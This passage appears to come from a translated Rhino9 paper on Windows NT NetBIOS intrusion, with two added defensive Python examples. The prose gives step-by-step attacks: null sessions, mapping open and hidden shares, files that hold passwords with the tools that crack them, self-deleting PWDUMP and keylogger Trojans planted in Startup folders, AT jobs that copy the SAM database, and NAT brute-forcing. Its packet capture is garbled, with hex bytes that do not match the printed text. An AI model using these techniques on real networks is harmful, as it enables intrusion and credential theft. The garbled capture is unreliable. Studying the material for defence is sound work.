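            exp.other.append((name, suffix, kind))
    # The Messenger service registers the machine name and, when someone is logged
    # on interactively, that user's name as well (the "two <03>" rule in the text).
    if exp.machine_name is None and messenger:
        exp.machine_name = messenger[0]
    for name in messenger:
        if name != exp.machine_name:
            exp.logged_on_user = name
            break
    return exp


def findings(exp: NbtExposure) -> List[str]:
    """Plain-language list of what the host discloses without any credentials."""
    out = []
    if exp.machine_name:
        out.append(f"machine name disclosed: {exp.machine_name}")
    if exp.domain_or_workgroup:
        out.append(f"domain/workgroup disclosed: {exp.domain_or_workgroup}")
    if exp.file_sharing:
        out.append("Server service registered: file/print shares reachable on TCP 139")
    if exp.logged_on_user:
        out.append(f"interactive user name disclosed: {exp.logged_on_user}")
    return out


if __name__ == "__main__":
    for line in findings(parse_nbtstat(SAMPLE_NBTSTAT)):
        print(line)
```

On the quoted output this yields the machine name DATARAT, the group R9LABS, an active Server service, and GHOST as the logged-on user, which is exactly the reading the paragraph above performs by eye.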
Next, the intruder establishes a null IPC session. Once it is in place, he can start a local copy of User Manager for Domains and use its Select Domain function. The remote machine's domain appears (or can be typed in manually) because it has been preloaded into the cache. If the remote machine is not secured, User Manager displays a list of all its users. Over a very slow link (such as a 28.8K modem) this generally does not work, but over a faster network connection it does. Now that the intruder has gathered information about your machine, the next step is actually penetrating it. The first penetration method we examine is the open file share attack. The intruder carries it out by combining the net view and net use commands mentioned earlier.
We use the earlier net view command to illustrate the intruder's attack:
C:\>net view \\0.0.0.0

Share name    Type   Used as   Comment
-------------------------------------------------------------------------------
Accelerator   Disk             Agent Accelerator share for Seagate backup
Inetpub       Disk
mirc          Disk
NETLOGON      Disk             Logon server share
www_pages     Disk
The command completed successfully.
Once the attacker has the list of remote shares, he tries to map to one of them. The command structure for this attack is:
c:\>net use x: \\0.0.0.0\inetpub
This attack only works when the share has no password or is assigned to the Everyone group (note: the Everyone group means everyone; someone who connects as a null user is now part of Everyone). If these conditions hold, the attacker can map a network drive to your machine and begin a series of penetration attacks. Remember that the intruder is not limited to mapping drives to the shares displayed by net view. Intruders who know NT know that NT has hidden administrative shares. By default, NT creates the IPC$ share and a hidden share for every drive on the machine (i.e. a machine with C, D and E drives has corresponding hidden shares C$, D$ and E$). There is also a hidden ADMIN$ share that maps directly to the NT installation path (i.e. if you installed NT in :\winnt, ADMIN$ maps to that exact location on the drive). The Rhino9 team has noticed that most of the NT security community pays little attention to the idea of penetrating one internal NT machine from another internal NT machine. During our professional assessments, the Rhino9 team has done exactly this many times. The problem is that a determined intruder who gains access to one of your machines will quietly work his way into the rest of the machines on the network. These share attacks are therefore a serious threat.
(Side note: the Rhino9 team once performed a remote penetration assessment of a large ISP in Florida. We first obtained share access to a technician's personal machine and from there gained access to the entire network. This is entirely doable.)
First, some people may not realize the danger to your machine when someone accesses your hard drive. Hard drive access opens new avenues for gathering information and planting Trojans/viruses. The attacker typically looks for content containing passwords or highly sensitive data, because he can use it to go deeper into your network. Listed below are some of the files a network intruder looks for and uses, with a brief description of each file and how it is used.
Eudora.ini: this file stores configuration information for the Eudora e-mail software. A tool called udpass.com extracts the user name, the password and everything else an intruder needs to steal the user's mail. The intruder can then read the target's mail simply by configuring his own e-mail software. Again, it takes some people a long time to realize this danger exists. But remember that people form habits easily: in most cases a user's e-mail password is the same as the password used to log on to the network. All the attacker has to do now is keep poking around the user's hard drive for a résumé or other work-related documents that point him to the user's place of business, so that he can launch a serious attack on that network.
Tree.dat: this file is used by the popular CuteFTP software to store the user's FTP sites/user names/passwords. Using a program called FireFTP, an attacker can easily crack the tree.dat file. As above, he can then keep gathering information about you and attack your place of business. Obviously, if tree.dat contains an FTP mapping directly to your place of business, attacking your network becomes even easier.
PWL: PWL files are typically found on Win95 machines. They store operation-specific passwords for Windows 95 end users. A tool called glide.exe cracks PWL files, and there are also documents describing how to break the PWL file encryption by hand with a calculator. The attacker then continues gathering information about the user and plans his attack.
PWD: PWD files are found on machines running FrontPage or Personal Web Server. They contain a plain-text user name and an encrypted password matching the credentials used to administer the web site. The encryption scheme used for these passwords is standard DES, and as is well known, many DES cracking utilities are available on the Internet. John the Ripper, written by Solar Designer, cracks these passwords very effectively.
WS_FTP.ini: this ini file is found on machines using the ws_ftp software. Although an automated password extractor for this file was only recently released to the security community, the encryption mechanism used is not strong. The password is converted into two-digit hexadecimal numbers; if a digit is at position N, N is added to that digit. Reversing the operation breaks the encryption scheme. (This method sometimes also breaks PMail.ini (Pegasus Mail) and Prefs.js (Netscape).)
IDC files: IDC (Internet Database Connector) files are generally used for back-end connections from the web server to a database. Because this type of connection usually requires authentication, some IDC files contain a plain-text user name/password.
waruser.dat: this is the configuration file for WarFTP, a popular Win32 FTP server. This particular dat file can contain the administrative password of the FTP server itself. To the authors' knowledge this only happens with WarFTP version 1.70.
$winnt$.inf: during an unattended installation of Windows NT, the setup process needs an information file. As a leftover of that installation, a file called $winnt$.inf sits in the %systemroot%\system32 directory. It can contain the user name/password of the account used during setup. This matters because the account used in these types of installation usually needs permissions on the network.
Sam._: although it has long been known that trouble follows when the SAM database falls into the wrong hands, many people forget the sam._ file. If an intruder can mount a drive over the network, how would he copy the SAM database? Normally he cannot, because the NT server he is connected to is running, and while it is running NT locks the SAM. However, if the administrator has created an Emergency Repair Disk, a copy of the SAM should be located in the %systemroot%\repair\ directory under the name sam._. By default this copy is readable by everyone. Using a copy of the samdump utility, you can dump the user names/passwords from the copied SAM.
ExchVerify.log: the ExchVerify.log file is generated by Cheyenne/Innoculan/ArcServe. It is normally created when the Cheyenne/Innoculan/ArcServe software is installed and sits in the root directory of the drive the software was installed on. This file can contain extremely sensitive information, as shown below:
: ExchAuthenticate() called with
NTServerName:[SAMPLESERVER]
NTDomainName[SAMPLESERVER] adminMailbox:[administrator]
adminLoginName:[administrator]
password:[PASSWORD]
Clearly, this file contains information an intruder can use to further compromise the integrity of your network.
Profile.tfm: Profile.tfm is a file generated by the POP3 client software AcornMail. At the time of writing, AcornMail was beginning to attract wide attention in the Internet community. When we tested the software we found it to be an effective POP3 client, but its installation does not play well with NTFS. After installing it, we examined the files AcornMail generates and found that Profile.tfm holds the user name/password. At first we concluded the software was fine, because it does store the password in encrypted form. Then we realized that the permissions on profile.tfm are set to Everyone/Full Control. That is a problem, because anyone can take a copy of the file and drop it into their own AcornMail installation. The intruder can then log on with the stored information. Below is the capture from Network Monitor:
00000000 00 01 70 4C 67 80 98 ED A1 00 01 01 08 00 45 00 ..pLg.........E.
00000010 00 4A EA A7 40 00 3D 06 14 88 CF 62 C0 53 D1 36 .J..@.=....b.S.6
00000020 DD 91 00 6E 04 44 F6 1E 84 D6 00 32 51 EB 50 18 ...nD....2Q.P.
00000030 22 38 64 9E 00 00 2B 4F 4B 20 50 61 73 73 77 6F "8d...+OK.Passwo
00000040 72 64 20 72 65 71 75 69 72 65 64 20 66 6F 72 20 rd.required.for.
00000050 68 6B 69 72 6B 2E 0D 0A                         jjohn...

00000000 98 ED A1 00 01 01 00 01 70 4C 67 80 08 00 45 00 ........pLg...E.
00000010 00 36 A4 02 40 00 80 06 18 41 D1 36 DD 91 CF 62 .6..@....A.6...b
00000020 C0 53 04 44 00 6E 00 32 51 EB F6 1E 84 F8 50 18 .SDn2Q.....P.
00000030 21 AC 99 90 00 00 50 41 53 53 20 67 68 6F 73 74 !.....PASS.xerox
00000040 37 33 0D 0A                                     63..
As you can see, the user name/password really is sent in plain text. This is not AcornMail's fault; the problem lies in POPvX itself. The Rhino9 team has tested this "data" file swap/packet capture method against a large amount of software, so the attack is not limited to AcornMail.
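The capture above is two Ethernet/IPv4/TCP frames whose payloads are POP3 text, and the cleartext PASS command is something a network monitor can flag automatically. The code below is an added example for this page, not part of the Rhino9 document: it builds constructed frames of the same shape as the capture (made-up documentation-range addresses and made-up credentials, checksums left at zero), decodes the headers to reach the TCP payload, and reports every client-to-server POP3 USER or PASS command without copying the secret itself into the finding.

```python
import struct
from socket import inet_aton, inet_ntoa
from typing import Dict, List, Optional

POP3_PORT = 110
# POP3 (RFC 1939) sends USER and PASS as plain text unless the session is wrapped in TLS.
CREDENTIAL_COMMANDS = (b"USER", b"PASS")


def build_frame(src_mac: str, dst_mac: str, src_ip: str, dst_ip: str,
                sport: int, dport: int, payload: bytes) -> bytes:
    """Constructed Ethernet II / IPv4 / TCP (PSH,ACK) frame for the example.
    Checksums stay zero: the decoder below does not validate them."""
    eth = (bytes.fromhex(dst_mac.replace(":", ""))
           + bytes.fromhex(src_mac.replace(":", ""))
           + b"\x08\x00")                                   # EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH",
                      sport, dport,
                      0x10000000, 0x20000000,                # seq / ack (arbitrary)
                      5 << 4,                                # data offset: 5 words = 20 bytes
                      0x18,                                  # flags PSH|ACK
                      8192, 0, 0)                            # window, checksum, urgent ptr
    total_len = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s",
                     0x45, 0, total_len,                     # version/IHL, TOS, total length
                     0x1234, 0x4000,                         # id, flags=DF, fragment offset 0
                     64, 6, 0,                               # TTL, protocol TCP, checksum
                     inet_aton(src_ip), inet_aton(dst_ip))
    return eth + ip + tcp + payload


def decode_tcp(frame: bytes) -> Optional[Dict]:
    """Return addresses, ports and TCP payload of an IPv4/TCP frame, else None."""
    if len(frame) < 14 + 20 + 20 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    if ip[9] != 6 or ihl < 20 or total_len > len(ip):       # not TCP, or truncated
        return None
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_offset = (tcp[12] >> 4) * 4
    return {
        "src": inet_ntoa(ip[12:16]), "dst": inet_ntoa(ip[16:20]),
        "sport": sport, "dport": dport,
        "payload": tcp[data_offset:],
    }


def find_cleartext_pop3_credentials(frames: List[bytes]) -> List[Dict]:
    """Flag client->server POP3 frames whose payload is a USER or PASS command.
    The credential value is deliberately not copied into the finding."""
    findings = []
    for frame in frames:
        pkt = decode_tcp(frame)
        if pkt is None or pkt["dport"] != POP3_PORT:
            continue
        command = pkt["payload"].split(b" ", 1)[0].rstrip(b"\r\n").upper()
        if command in CREDENTIAL_COMMANDS:
            findings.append({
                "src": pkt["src"], "dst": pkt["dst"], "command": command.decode(),
                "detail": f"cleartext POP3 {command.decode()} from {pkt['src']} "
                          f"to {pkt['dst']}:{POP3_PORT}",
            })
    return findings


# Constructed POP3 exchange: addresses, MACs and credentials are all made up.
CLIENT, SERVER = "192.0.2.10", "198.51.100.25"
CLIENT_MAC, SERVER_MAC = "02:00:00:00:00:0a", "02:00:00:00:00:19"
SAMPLE_FRAMES = [
    build_frame(SERVER_MAC, CLIENT_MAC, SERVER, CLIENT, 110, 1092, b"+OK POP3 server ready\r\n"),
    build_frame(CLIENT_MAC, SERVER_MAC, CLIENT, SERVER, 1092, 110, b"USER example-user\r\n"),
    build_frame(SERVER_MAC, CLIENT_MAC, SERVER, CLIENT, 110, 1092,
                b"+OK Password required for example-user.\r\n"),
    build_frame(CLIENT_MAC, SERVER_MAC, CLIENT, SERVER, 1092, 110, b"PASS example-secret\r\n"),
]

if __name__ == "__main__":
    for finding in find_cleartext_pop3_credentials(SAMPLE_FRAMES):
        print(finding["detail"])
```

The server's "+OK Password required" banner is decoded but not flagged, because it carries no secret; the two client commands are. The same decoder applies to any IPv4/TCP capture of the shape shown above, so the check is not specific to AcornMail either.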
Having discussed the files an intruder wants if he gains access to your hard drive, we now turn to planting Trojans. If there is one way for an attacker to obtain a large amount of information, it is a Trojan. Open file share attacks generally make planting Trojans easy. Among the easiest to plant and best known is the PWDUMP utility wrapped in a batch file. Properly prepared, the batch file runs minimized (under a clever name such as viruscan.cmd), runs the PWDUMP utility, deletes PWDUMP once its process has finished, and finally deletes itself. It usually leaves no evidence and produces, on that machine, a complete text file of all user names/passwords.
The rules of the "game": the target must be an NT host, and the end user who executes the Trojan must be an administrator, so that the attacker can place the batch file in the administrator's Startup folder and wait. The next time the administrator logs on to the machine, the batch file runs and dumps the user names/passwords. The attacker then connects to the machine over the file share and collects the results. Another reliable attack the intruder may try is placing a keystroke-logger batch file in the Startup folder. This works for any user, not just administrators. It captures every keystroke the user types, except the initial logon credentials (this is due to NT's architecture, which terminates all user-mode processes during logon). The attacker then connects to the target machine and collects the recorded keystrokes. One of the deadliest Trojan attacks is a batch file that runs as an administrator and uses the AT command to schedule an event. Because AT runs as SYSTEM, it can produce copies of the SAM database and the registry. One can imagine how much fun an attacker has with this method.

How do you prevent these attacks? Do not share files to the Everyone group, and strengthen the password policy in your environment. An intruder who hits a server that prompts him for credentials every time gets frustrated and moves on. A patient intruder, however, will continue with a brute-force attack. Without doubt the most commonly used tool for brute-force NetBIOS attacks is NAT. NAT (the NetBIOS Auditing Tool) automates the net connection commands against lists of possible user names/passwords: it tries to connect to the remote machine with every user name and every password in the supplied lists. This is a very slow process, so attackers tend to use a shortened list of common passwords. A successful intruder builds his own user-name list from the information-gathering methods described above, and the password list he intends to use is also built from the information gathered. Intruders usually start with a thin password list and then build the rest from the user names. This comes as no surprise to security professionals, who regularly find passwords set to the user name. The attacker can specify a single IP address to attack or an entire range of addresses. NAT does its best to complete the task and produces a formatted report as it goes.